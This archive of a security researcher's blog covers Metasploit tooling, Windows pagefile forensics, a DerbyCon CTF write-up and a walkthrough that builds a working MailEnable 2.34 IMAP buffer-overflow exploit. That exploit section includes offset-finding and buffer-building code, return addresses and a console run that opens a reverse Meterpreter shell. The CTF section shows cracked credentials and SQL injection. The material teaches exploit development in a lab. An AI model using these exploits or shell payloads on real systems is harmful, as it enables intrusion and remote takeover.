Showing posts with label security. Show all posts

Saturday, March 31, 2012

Communicating with your Metasploit server via Mono/.NET

A few months ago, I released a library that helped integrate Nexpose into your .NET/Mono applications. A few nights ago, I checked in my library that allows communication and integration with Metasploit from your .NET/Mono applications. Very much in beta, and I am not calling it feature complete. Works for the most part, but bugs will be found (and patches accepted!). Take a look at the Example I have to see it in action. It follows the same Session/Manager pattern as the nexpose library does. No pro methods added yet, just core.

Wednesday, December 28, 2011

New metasploit modules in trunk

Last night HDM checked in a telnetd remote root scanner and exploit module for BSD-derived telnetd servers (this vuln affects telnet clients as well). We were up late last night working on it. Any testing is appreciated.

Today, sinn3r checked my CorpWatch API modules into trunk. These aid in OSINT research for a company during an engagement.

Tuesday, November 15, 2011

Metasploit and the Penetration Testing Execution Standard

I was recently asked to map out the Metasploit Framework's functionality with the PTES.

Have a look at the whitepaper, if you are interested in Metasploit or network security, it should be a great read.

www.tinyurl.com/msf-ptes

Saturday, November 12, 2011

CorpWatch API integration with Metasploit: Information Gathering

I have submitted two modules today to the Metasploit redmine that allow integration of the CorpWatch API. They are very neat modules, allowing you to bring in information from SEC EDGAR straight into Metasploit without leaving the console. You can find and research parent and child companies, view past addresses, past names, SEC filings, all sorts of valuable information when gathering information on a company during an engagement.

Here is an example run: http://pastebin.com/d9MKjiQ2

Hopefully these modules will hit trunk soon, but if you want to play with them now, the diff is taken from the framework root.

Tuesday, October 4, 2011

Analyzing the Windows pagefile.sys from GNU/Linux

Problem: Given a pagefile.sys, how much information can you gain about the victim?

Hints: pagefile.sys is the on-disk backing store for memory the kernel has paged out, written in 4 KiB pages with no file-level structure of its own, so treat it as a raw dump of whatever process memory was swapped out. One thing to keep in mind: GNU strings only reports 8-bit strings by default, while Windows keeps most paths and every process's environment block in UTF-16LE, so repeat each search below with "strings -e l pagefile.sys" as well.


strings pagefile.sys | grep -i "^[a-z]:\\\\" | sort | uniq | less #List all paths in pagefile


NOTE: You could find a lot of paths referencing "d:\nt\base\random\path\to\src.c". These seem to be related to the drivers being loaded into memory and being pushed to the pagefile.

---------------


strings pagefile.sys | grep -E "^[A-Za-z_][A-Za-z0-9_]*=.+" | sort -u | less #print env vars


You will invariably get a lot of false positives with this one. But a lot of good information as well.

----------------


strings pagefile.sys | grep -Eo '[[:alnum:]_.%+-]{1,64}@[[:alnum:]_.-]{2,255}\.[[:alpha:]]{2,}' | sort -u #print all email addresses.


There is a lot of good information that can be found that regular expressions simply can't pick up (or I just didn't think of).
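Here is the same carving done in one pass over both encodings, as an added example that is not part of the original post. It pulls printable runs out of a blob the way strings does, additionally decodes UTF-16LE runs (which plain strings misses, and which is where Windows keeps most paths and every environment block), and sorts the results into paths, environment variables and e-mail addresses using tightened versions of the patterns above. The sample blob standing in for a pagefile fragment is constructed inline.

```python
import re

# 8-bit printable runs (what `strings` finds) and UTF-16LE runs (what `strings -e l` finds);
# 4 is the same minimum run length GNU strings uses.
ASCII_RUN = re.compile(rb'[\x20-\x7e]{4,}')
UTF16_RUN = re.compile(rb'(?:[\x20-\x7e]\x00){4,}')

# Classifiers applied to every decoded string
PATH_RE = re.compile(r'^[A-Za-z]:\\')                      # drive-letter paths
ENV_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*=.+')          # NAME=value, as laid out in an environment block
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{2,255}\.[A-Za-z]{2,}')


def carve_strings(blob):
    """Yield (offset, encoding, text) for every printable run in either encoding."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), 'ascii', m.group().decode('ascii')
    for m in UTF16_RUN.finditer(blob):
        yield m.start(), 'utf-16le', m.group().decode('utf-16-le')


def classify(blob):
    """Return sorted, de-duplicated paths, environment variables and e-mail addresses found in blob."""
    found = {'paths': set(), 'env': set(), 'emails': set()}
    for _offset, _encoding, text in carve_strings(blob):
        if PATH_RE.match(text):
            found['paths'].add(text)
        if ENV_RE.match(text):
            found['env'].add(text)
        found['emails'].update(EMAIL_RE.findall(text))
    return {kind: sorted(values) for kind, values in found.items()}


# Constructed stand-in for a pagefile fragment: an 8-bit path, a UTF-16LE path,
# a UTF-16LE environment block and a mail header, separated by binary noise.
SAMPLE = (
    b'\x00' * 16
    + b'C:\\Windows\\System32\\drivers\\foo.sys\x00'
    + b'\x8f\x01\x00\x00'
    + 'C:\\Users\\alice\\AppData\\Roaming'.encode('utf-16-le') + b'\x00\x00'
    + 'USERNAME=alice\x00TEMP=C:\\Users\\alice\\AppData\\Local\\Temp\x00'.encode('utf-16-le')
    + b'\xff' * 8
    + b'From: Alice <alice@example.com>\x00'
)

if __name__ == '__main__':
    for kind, values in classify(SAMPLE).items():
        print(kind)
        for value in values:
            print('   ', value)
```

Against the sample, the UTF-16LE path and both environment variables are only found by the second pattern; a plain strings run would report the 8-bit path and the mail header and nothing else.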


-----------


One thing you can do to help protect yourself is to look at this KB article on how to wipe your pagefile on shutdown. A simple registry tweak is all it takes.

If you have shell on the victim, using meterpreter you can find out the values of this key using this:


reg enumkey -k HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session\ Manager\\Memory\ Management


From the KB article:

Change the data value of the ClearPageFileAtShutdown value in the following registry key to a value of 1:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
If the value does not exist, add the following value:
Value Name: ClearPageFileAtShutdown
Value Type: REG_DWORD
Value: 1

Monday, October 3, 2011

DerbyCon CTF Results and Notes

This weekend I attended DerbyCon, a hacker convention being held for its first time in Louisville, Kentucky. It had great talks by industry heavyweights in security, and a really awesome and fun CTF game. Initially, I wasn't even planning on playing the CTF. I had never done anything like the CTF before, and expected to be trounced. As it turns out though, a friend of mine, TheLightCosine, and I were bored and decided to check it out. TheLightCosine was actually taking Win32 exploit development training from corelanc0der and wasn't able to compete very much. Even when not in training, his brain was fried. The training was a bootcamp. With some help from TheLightCosine, however, I was able to place 5th on the CTF. Next year, I plan to be more organized and take the game a bit more seriously. All the notes I list here were just kept in my head, so I may miss a few things. This is also an abridged version.

The rules were simple. A small network was setup (derbycon_ctf) with no internet connection. There were two public targets that you were allowed to hack on (10.1.1.15,10.1.1.16), and one public target that was off limits (10.1.1.10). The latter was where the scoreboard resided and where you submitted your flags for your points.

The first thing I did when joining was nmapping the two targets that we were allowed to hack.

nmap -sS -O -PN -PU 10.1.1.15,16


This gave me an initial idea of what services the boxen were running. 10.1.1.15 had ports 80, 13370, and 3389 open. 10.1.1.16 was running 21, 80, 443, and 3389. Both were Windows 2003 boxes. Occasionally, ports 23, 25, and 1337 would open on 10.1.1.16. This really confused me, but I assumed right off the bat that they were actually netcat listeners. I was never able to connect to one as someone always found them before I did. During the closing ceremonies, when the CTF prizes were given out, my assumption was confirmed by the CTF admins. They were netcat listeners.

One of the most important stages when hacking into machines like this is simple information gathering. We have HTTP/S ports, we have FTP, and we have MS Terminal Services. It turns out that port 13370 on 10.1.1.15 is also HTTP. The SSL Certificate for the HTTPS port on 10.1.1.16 was invalid, something to note for later use.

First things first, I hit up the ftp port. 'Lo and behold, a flag was waiting for me in the banner (Flag=AnonymousFTP). Logging in I found about 10 or so files on the ftp and two folders. One folder was locked down, I couldn't get in. The other, however, contained a text file with usernames and hashes. Other files on the root of the ftp were firefox databases for saved credentials, a .NET exe that you were required to reverse engineer (I almost figured this one out), a pcap file, and a file with a .docx extension (though it is just a plain text file). I downloaded these files to a local folder for later processing. My first action was to crack those hashes I found on the ftp server. I used john for this.


root@gits-and-shiggles:/home/upgraydd/Pictures/hidden# john --show secretdata
Administrator:NO PASSWORD:500:28361B9A6A28663E73EB37AA1787B284:::
derbycon:KENTUCKY:1012:8CFC8328E285BAE5702FB32AE7C95F87:::
ftpuser:FTP1:1013:2AED8B7C119F79B4F81D3FF9EB1760F3:::
jamesbond:007:1015:0B0412D8761239A73143EFAE928E9F0A:::
root:TOOR:1014:AFC44EE7351D61D00698796DA06B1EBF:::
sqldb:NO PASSWORD:1007:9CB9DCE36C9566A195A42282ADC6A404:::
texasranger:CHUCKNORRIS:1016:167A7A68DEA1D4FBD7B3F4F444690F24:::

9 password hashes cracked, 0 left
root@gits-and-shiggles:/home/upgraydd/Pictures/hidden#


This gave me credentials to work with now. None of these creds allowed me to get into the locked folder on ftp like I expected. I set these aside for later use. Once I had these, I decided to take a look at the terminal services ports. I used tsclient to connect to both 10.1.1.15 and 10.1.1.16. This gave me a flag, but none of my credentials worked to log in. The flag, interestingly enough, was WasteOfTime. I decided to start perusing the http ports next.

10.1.1.16:80 gave two flags actually. One in the title of the index page, and one as an HTML comment. Super easy stuff. 10.1.1.16:80 also gives you a url to 10.1.1.15:13370/upload/upload.aspx. I wasn't able to break this script and get the flag I wanted.

Before I forget, one of the files on the FTP root was a file called qr.jpg. Opening this up and reading the QR code with my phone yielded a flag. Dumping the exif data showed an interesting sup3rs3cr3tk3y string; apparently this was a flag, but it was not as apparent as the rest. When I found this out, I /headdesk'ed.

If you go to the HTTP root of 10.1.1.15:13370, you find a replica of the derbycon.com website. It is slightly altered, however: a few flags are thrown around inside it and in cookies. There is also a new News page, which I figured out an SQL injection for to receive another flag. Thankfully, TheLightCosine showed me how to save the POST request with the SQL injection via Burp Suite and pass the request to sqlmap. This was a gold mine, giving me many more flags. I missed one however, and I have no idea where it would have been. It also turns out the version of sqlmap in the Ubuntu repos is very old. I needed to download the latest release from sourceforge in order to use this functionality (the -r flag in sqlmap).

Also on this news page was an HTML comment with some credentials. I found this very early on and tried it on the FTP with no success. This bothered me because the credentials were ftpuser:ThisWillGetYouIn. It turns out the admins mistyped the username. It was supposed to be ftpadmin:ThisWillGetYouIn. Once they realised what happened, they updated the scoreboard with some vague information about an FTP credential on the site being fixed. I saw this, went back and grabbed the new creds. This worked on the FTP and got me into the folder I was not allowed in earlier. Inside the folder was a textfile with another flag.

I also remembered at this point I had yet to look at the robots.txt file on any of the web servers. This also led to two flags being found. One in the robots.txt file itself, and one that was referenced by the robots.txt.

While I let sqlmap dump what it found, I decided to go ahead and look at the files I got off ftp one more time. Three files jumped out at me: signons.sqlite, cert8.db and key3.db. These files are where Firefox keeps its saved credentials. I don't use firefox, and actually uninstalled it quite a long time ago off my netbook. I installed it, dropped the files into my user profile, went to Properties > Security > Show passwords in firefox and got another flag.

One thing I found in the /download folder of 10.1.1.15:13370 was a testkey.pem.txt. This was a private key. The pcap file on the ftp had SSL traffic in it, so TheLightCosine showed me how to decrypt the SSL traffic in the pcap file through wireshark. Once decrypted we found another flag. However, I felt like there was more to this pcap file than met the eye. I ran the pcap file through strings and ended up finding yet another flag.

At this point, I felt like I had exhausted the web servers for clues. I decided to run nikto on each port offering HTTP on both 10.1.1.15 and 10.1.1.16. This yielded a flag in the SSL cert and a vulnerable version of FCKeditor which I was unable to pop. During the closing ceremonies, the admins also showed us a file that nobody had gotten. A web.config.txt was sitting on the root of one of the web servers.

At this point, I turned my attention to the .NET exe. I was able to use mono to run it.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
No flag for you.
root@gits-and-shiggles:/home/upgraydd/Pictures#


I decided to see what happened when I passed it an argument.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe fdjskla
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
Try Harder N00b.
root@gits-and-shiggles:/home/upgraydd/Pictures#


Interesting, so it recognizes an argument was passed and changes its output. At this point I decided to disassemble the executable using monodis.



WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
.assembly extern mscorlib
{
.ver 4:0:0:0
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly extern System.Core
{
.ver 4:0:0:0
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly 'fu'
{
.custom instance void [mscorlib]System.Runtime.Versioning.TargetFrameworkAttribute::.ctor(string) = (
01 00 29 2E 4E 45 54 46 72 61 6D 65 77 6F 72 6B // ..).NETFramework
2C 56 65 72 73 69 6F 6E 3D 76 34 2E 30 2C 50 72 // ,Version=v4.0,Pr
6F 66 69 6C 65 3D 43 6C 69 65 6E 74 01 00 54 0E // ofile=Client..T.
14 46 72 61 6D 65 77 6F 72 6B 44 69 73 70 6C 61 // .FrameworkDispla
79 4E 61 6D 65 1F 2E 4E 45 54 20 46 72 61 6D 65 // yName..NET Frame
77 6F 72 6B 20 34 20 43 6C 69 65 6E 74 20 50 72 // work 4 Client Pr
6F 66 69 6C 65 ) // ofile

.custom instance void class [mscorlib]System.Reflection.AssemblyTitleAttribute::'.ctor'(string) = (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

.custom instance void class [mscorlib]System.Reflection.AssemblyDescriptionAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Reflection.AssemblyConfigurationAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Reflection.AssemblyCompanyAttribute::'.ctor'(string) = (01 00 09 4D 69 63 72 6F 73 6F 66 74 00 00 ) // ...Microsoft..

.custom instance void class [mscorlib]System.Reflection.AssemblyProductAttribute::'.ctor'(string) = (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

.custom instance void class [mscorlib]System.Reflection.AssemblyCopyrightAttribute::'.ctor'(string) = (
01 00 1B 43 6F 70 79 72 69 67 68 74 20 C2 A9 20 // ...Copyright ..
4D 69 63 72 6F 73 6F 66 74 20 32 30 31 31 00 00 ) // Microsoft 2011..

.custom instance void class [mscorlib]System.Reflection.AssemblyTrademarkAttribute::'.ctor'(string) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::'.ctor'(bool) = (01 00 00 00 00 ) // .....

.custom instance void class [mscorlib]System.Runtime.InteropServices.GuidAttribute::'.ctor'(string) = (
01 00 24 65 34 65 37 63 61 36 63 2D 63 32 61 62 // ..$e4e7ca6c-c2ab
2D 34 32 34 32 2D 61 33 65 35 2D 34 63 39 33 33 // -4242-a3e5-4c933
63 37 30 65 66 62 30 00 00 ) // c70efb0..

.custom instance void class [mscorlib]System.Reflection.AssemblyFileVersionAttribute::'.ctor'(string) = (01 00 07 31 2E 30 2E 30 2E 30 00 00 ) // ...1.0.0.0..

.custom instance void class [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::'.ctor'(int32) = (01 00 08 00 00 00 00 00 ) // ........

.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = (
01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 // ....T..WrapNonEx
63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) // ceptionThrows.

.hash algorithm 0x00008004
.ver 1:0:0:0
}
.module fu.exe // GUID = {B3456451-E34C-4B2C-A452-4A83679B44EF}


.namespace fu
{
.class private auto ansi beforefieldinit Program
extends [mscorlib]System.Object
{

// method line 1
.method private static hidebysig
default void Main (string[] args) cil managed
{
// Method begins at RVA 0x2050
.entrypoint
// Code size 98 (0x62)
.maxstack 2
.locals init (
string V_0,
string V_1,
string V_2,
bool V_3)
IL_0000: ldc.i4.1
IL_0001: br.s IL_0006

IL_0003: ldc.i4.0
IL_0004: br.s IL_0006

IL_0006: brfalse.s IL_0008

IL_0008: nop
IL_0009: ldstr "290e1babf4daa83eb606f0b4e02c73be"
IL_000e: stloc.0
IL_000f: ldstr "/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0="
IL_0014: stloc.1
IL_0015: ldarg.0
IL_0016: ldlen
IL_0017: conv.i4
IL_0018: ldc.i4.1
IL_0019: ceq
IL_001b: stloc.3
IL_001c: ldloc.3
IL_001d: brtrue.s IL_002d

IL_001f: nop
IL_0020: ldstr "No flag for you."
IL_0025: call void class [mscorlib]System.Console::WriteLine(string)
IL_002a: nop
IL_002b: br.s IL_0061

IL_002d: ldarg.0
IL_002e: ldc.i4.0
IL_002f: ldelem.ref
IL_0030: call string class fu.Program::GetMd5Hash(string)
IL_0035: stloc.2
IL_0036: ldloc.2
IL_0037: ldloc.0
IL_0038: call bool string::Equals(string, string)
IL_003d: stloc.3
IL_003e: ldloc.3
IL_003f: brtrue.s IL_004f

IL_0041: nop
IL_0042: ldstr "Try Harder N00b."
IL_0047: call void class [mscorlib]System.Console::WriteLine(string)
IL_004c: nop
IL_004d: br.s IL_0061

IL_004f: ldloc.1
IL_0050: call void class [mscorlib]System.Console::WriteLine(string)
IL_0055: nop
IL_0056: ldstr "Fix me :P"
IL_005b: call void class [mscorlib]System.Console::WriteLine(string)
IL_0060: nop
IL_0061: ret
} // end of method Program::Main

// method line 2
.method private static hidebysig
default string GetMd5Hash (string input) cil managed
{
// Method begins at RVA 0x20c0
// Code size 90 (0x5a)
.maxstack 3
.locals init (
class [mscorlib]System.Security.Cryptography.MD5 V_0,
unsigned int8[] V_1,
class [mscorlib]System.Text.StringBuilder V_2,
int32 V_3,
string V_4,
bool V_5)
IL_0000: nop
IL_0001: call class [mscorlib]System.Security.Cryptography.MD5 class [mscorlib]System.Security.Cryptography.MD5::Create()
IL_0006: stloc.0
IL_0007: ldloc.0
IL_0008: call class [mscorlib]System.Text.Encoding class [mscorlib]System.Text.Encoding::get_UTF8()
IL_000d: ldarg.0
IL_000e: callvirt instance unsigned int8[] class [mscorlib]System.Text.Encoding::GetBytes(string)
IL_0013: callvirt instance unsigned int8[] class [mscorlib]System.Security.Cryptography.HashAlgorithm::ComputeHash(unsigned int8[])
IL_0018: stloc.1
IL_0019: newobj instance void class [mscorlib]System.Text.StringBuilder::'.ctor'()
IL_001e: stloc.2
IL_001f: ldc.i4.0
IL_0020: stloc.3
IL_0021: br.s IL_0041

IL_0023: nop
IL_0024: ldloc.2
IL_0025: ldloc.1
IL_0026: ldloc.3
IL_0027: ldelema [mscorlib]System.Byte
IL_002c: ldstr "x2"
IL_0031: call instance string unsigned int8::ToString(string)
IL_0036: callvirt instance class [mscorlib]System.Text.StringBuilder class [mscorlib]System.Text.StringBuilder::Append(string)
IL_003b: pop
IL_003c: nop
IL_003d: ldloc.3
IL_003e: ldc.i4.1
IL_003f: add
IL_0040: stloc.3
IL_0041: ldloc.3
IL_0042: ldloc.1
IL_0043: ldlen
IL_0044: conv.i4
IL_0045: clt
IL_0047: stloc.s 5
IL_0049: ldloc.s 5
IL_004b: brtrue.s IL_0023

IL_004d: ldloc.2
IL_004e: callvirt instance string object::ToString()
IL_0053: stloc.s 4
IL_0055: br.s IL_0057

IL_0057: ldloc.s 4
IL_0059: ret
} // end of method Program::GetMd5Hash

// method line 3
.method private static hidebysig
default string EncryptString (string plainText, string Key) cil managed
{
// Method begins at RVA 0x2128
} // end of method Program::EncryptString

// method line 4
.method private static hidebysig
default string DecryptString (string cipherText, string Key) cil managed
{
// Method begins at RVA 0x228c
} // end of method Program::DecryptString

// method line 5
.method public hidebysig specialname rtspecialname
instance default void '.ctor' () cil managed
{
// Method begins at RVA 0x24c4
// Code size 7 (0x7)
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void object::'.ctor'()
IL_0006: ret
} // end of method Program::.ctor

} // end of class fu.Program
}


I immediately noticed that it stores an MD5 hash in a string, and another string that appears to be base64. Following the logic, I realised that it took the argument, MD5'd it and compared the result to the stored MD5 sum. If it matched, it would print the base64 string and tell you to fix it. Technically, you don't even need to know what argument it is expecting, but I wanted to be thorough. The MD5 sum is the MD5 of the string 'kc57' (one of the CTF admins, @_kc57).
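Pulled out of the IL above into a few lines of Python, as an added example that is not part of the original post: get_md5_hash and run mirror Program::GetMd5Hash and the three branches of Program::Main, and crack does what a CTF player actually needs, hashing a candidate list until one matches the stored digest. The two string constants are the ones from the disassembly; the wordlist in the usage is made up for the example.

```python
import hashlib

# Constants lifted from the fu.exe disassembly (the ldstr operands in Program::Main)
STORED_MD5 = '290e1babf4daa83eb606f0b4e02c73be'
PAYLOAD = '/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0='


def get_md5_hash(text):
    """Program::GetMd5Hash: MD5 over the UTF-8 bytes, each byte rendered as lowercase hex ("x2")."""
    return hashlib.md5(text.encode('utf-8')).hexdigest()


def run(args, stored=STORED_MD5, payload=PAYLOAD):
    """Program::Main's decision logic, returning the lines it would print."""
    if len(args) != 1:                        # ldarg.0 / ldlen / ldc.i4.1 / ceq
        return ['No flag for you.']
    if get_md5_hash(args[0]) != stored:       # string::Equals on the two hex digests
        return ['Try Harder N00b.']
    return [payload, 'Fix me :P']


def crack(stored, candidates):
    """Recover the expected argument from a candidate list; an unsalted MD5 of a short string costs nothing to brute force."""
    for candidate in candidates:
        if get_md5_hash(candidate) == stored:
            return candidate
    return None


if __name__ == '__main__':
    # Made-up wordlist for the example; the post reports that the real argument is the admin's handle, kc57
    words = ['derbycon', 'flag', 'kc57', 'password']
    answer = crack(STORED_MD5, words)
    print('argument:', answer)
    for line in run([answer] if answer else []):
        print(line)
```

The check only ever compares a hash, so nothing in the binary needs to be patched: feeding the right argument, or a wordlist that contains it, is enough to reach the branch that prints the base64 string.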



root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe kc57
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0=
Fix me :P
root@gits-and-shiggles:/home/upgraydd/Pictures#


This string stumped me. I spent too much time on it and probably went every way I shouldn't have in order to figure it out. I never did.


I look forward to competing next year. TheLightCosine and I will probably team up for real and pwn some pants off.

Wednesday, July 6, 2011

Breaking MailEnable 2.34: A lesson in security featuring Metasploit, Immunity Debugger, and mona.py

Not that this is any major feat, but I thought it would do as a nice primer on investigating bugs with Immunity Debugger and mona.py and exploiting them with Metasploit.


I was researching a vulnerability today: Metasploit has a module called mailenable_login with a single target, MailEnable 2.35. It is a stack-based buffer overflow, and 2.35 is not the only version vulnerable to this bug. From the CVE:


Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.


This is a good thing, because after searching for about an hour, I hadn't found an installer for the 2.35 version. The official historical archive for the MailEnable releases has that release conspicuously missing. However, other reportedly vulnerable releases, such as 2.34, were available. I happily grabbed 2.34, hoping I would be able to get it to work without too much effort.

Well, short story short, the target in the module didn't "just work" as I had hoped. But it did crash the server, which was interesting. I decided to look further. I am not very seasoned at this type of debugging, so the guys in #corelan on irc.freenode.net were my first stop for getting pushed in the right direction.

Up until now, I had been using WinDbg, the debugger Microsoft ships with its Driver Development Kit. corelanc0der offered better advice: grab a copy of Immunity Debugger and mona.py. After installing Immunity Debugger, I dropped mona.py in the PyCommands folder under the Immunity Debugger folder in Program Files. This enables the "swiss army knife" the corelan team developed to speed up exploit development. I don't fully understand it yet, but can already see it is quite powerful. The first thing I had to do was crash the service, in this case MEIMAPS.exe. I attached Immunity Debugger to the running MEIMAPS.exe (it starts automatically as a service), ran the 2.35 target against it, and bam.



Notice how EIP is the same address as the return address in the original 2.35 target...



So that obviously doesn't work; we don't like access violations. Maybe mona.py can show us some better places to return to in this application. But in order to do this, I need to make a few changes to the original Metasploit module. Open it up in your favorite text editor (I used vim) and change the sploit buffer: comment out the original lines and replace them with a pattern_create(1000) buffer.



Check out this rather old article with details on pattern_create(). Sending the pattern instead of a run of identical bytes gives mona.py data it can reason about: every 4-byte window of the pattern is unique, so whatever lands in EIP, or anywhere on the stack, maps back to exactly one offset in the buffer. A really cool feature of mona.py is that it will generate a template for your exploit with the offsets and return pointers needed to execute arbitrary code; all you do is fill in the blanks. Let's see what mona.py has to offer:
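As an added example that is not part of the original post or of Metasploit or mona.py themselves, here is what pattern_create and its counterpart pattern_offset do, in Python, plus the step that follows them: laying out the buffer with the chosen return pointer at the offset they found. The EIP value in the usage is made up for the example; the return address is 0x76095d68, one of the two MSVCP60.DLL pointers mentioned later in this post. The bad-character filter is an assumption appropriate to a line-oriented protocol like IMAP, not something mona.py or the module does for you.

```python
import string
import struct

# NUL, LF and CR: any of these in the pointer would cut a line-oriented IMAP command short of the overflow
IMAP_BAD_CHARS = b'\x00\x0a\x0d'


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: 26 * 26 * 10 three-byte groups (20280 bytes),
    within which every 4-byte window is unique, so any value read out of a register or the stack
    maps back to exactly one offset in the buffer."""
    full = ''.join(u + l + d for u in string.ascii_uppercase
                   for l in string.ascii_lowercase for d in string.digits)
    if length > len(full):
        raise ValueError('a pattern longer than %d bytes repeats, making offsets ambiguous' % len(full))
    return full[:length]


def pattern_offset(pattern, value):
    """Offset of the bytes seen in EIP, given either as the int the debugger shows or as the raw 4 characters.
    x86 is little-endian, so a register showing 0x31614130 was loaded from the bytes '0Aa1'."""
    needle = struct.pack('<I', value).decode('latin-1') if isinstance(value, int) else value
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def build_buffer(offset, ret_addr, payload, nop_sled=16, bad_chars=IMAP_BAD_CHARS):
    """Filler up to the saved return address, the pointer (little-endian), a NOP sled, then the payload."""
    ptr = struct.pack('<I', ret_addr)
    if any(b in bad_chars for b in ptr):
        raise ValueError('return address %#x contains a bad character: %s' % (ret_addr, ptr.hex()))
    return b'A' * offset + ptr + b'\x90' * nop_sled + payload


if __name__ == '__main__':
    pattern = pattern_create(1000)          # what the sploit buffer is swapped for while hunting the offset
    eip = 0x31614130                        # made-up crash value for the example
    offset = pattern_offset(pattern, eip)
    print('EIP %#x came from offset %d' % (eip, offset))
    # push esp / ret pointer in MSVCP60.DLL from this post; int3 bytes stand in for shellcode
    buf = build_buffer(offset, 0x76095d68, b'\xcc' * 8)
    print(buf[:offset + 8].hex())
```

build_buffer refuses a pointer whose bytes include a NUL or a line ending, which is the check worth running before trusting any address a pointer search hands you: the encoded form is what travels in the LOGIN command, so it is the bytes, not the number, that have to survive the parser.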



If mona.py finds something it thinks is useful, you will get a small popup with predefined templates in a drop-down box. I chose the remote client (tcp) template. Another series of popup dialogs follows, one meaningful and one not so meaningful. The former asks for the remote port; the latter for the Exploit-DB id. Annoyingly, due to a bug in Immunity Debugger, your answer in the remote port box carries over into the next box, the Exploit-DB id box. You do not want this, so be sure to clear it out if you don't want to include an Exploit-DB id.




Anyways, enough with silly dialogs. When everything is said and done, inside C:\Program Files\Immunity Inc\Immunity Debugger\ will lie an exploit.rb file. This is your exploit module shell for Metasploit. Be sure to check it over, it may not be optimal, even if it does *work*.




Hmm, looks like it'll work. But what the fudge is CLBCATQ.DLL? We want something a little more standard than this. Luckily, mona.py has some tools specifically for this.
We know we want a jmp esp (or a push esp / ret). push was what the generated module used. It works, but let's try a jmp first: it is what the first target uses, so it would be a bit more straightforward and consistent.



Cool! We found 2 pointers in a pretty freaking stable place, MSVCP60.DLL. Let's take a closer look.



Cool, so we have one jmp esp and one push esp / ret. Remember our original exploit.rb that mona.py generated for us? The return address it defines in CLBCATQ.DLL (0x76ffcb51) can be replaced with either of these addresses (0x76095d68 is the push and 0x760a9d6e is the jmp) in MSVCP60.DLL. The two addresses are printed out to the screen right above the red text. The two lines each begin with an address and either of these will do. We need to dig into the Metasploit framework now. We need to add the target, which should really work for more than just this 2.34 release. The CVE lists a few in the 2.3x range. I think it should hit all of them, but am willing to eat my words: the return address is a hard-coded pointer into MSVCP60.DLL, so it only holds for installs that load the same build of that DLL at the same base.



Your targets in the mailenable_login.rb module should look similar to this, depending on the return address you chose from MSVCP60.DLL. Let's test it. You need to uncomment the original sploit lines from before and remove the pattern_create(1000) line you inserted.



root@bperry-laptop:/home/bperry# msfconsole -L



=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 710 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13108 updated today (2011.07.06)

msf > use exploit/windows/imap/mailenable_login
msf exploit(mailenable_login) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(mailenable_login) > show targets

Exploit targets:

Id Name
-- ----
0 MailEnable 2.35 Pro
1 MailEnable 2.34 Pro


msf exploit(mailenable_login) > set TARGET 1
TARGET => 1
msf exploit(mailenable_login) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mailenable_login) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(mailenable_login) > show options

Module options (exploit/windows/imap/mailenable_login):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.105 yes The target address
RPORT 143 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.1.71 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
1 MailEnable 2.34 Pro


msf exploit(mailenable_login) > exploit

[*] Started reverse handler on 192.168.1.71:4444
[*] Trying target MailEnable 2.34 Pro...
[*] Sending stage (752128 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.71:4444 -> 192.168.1.105:1037) at 2011-07-06 21:27:55 -0500

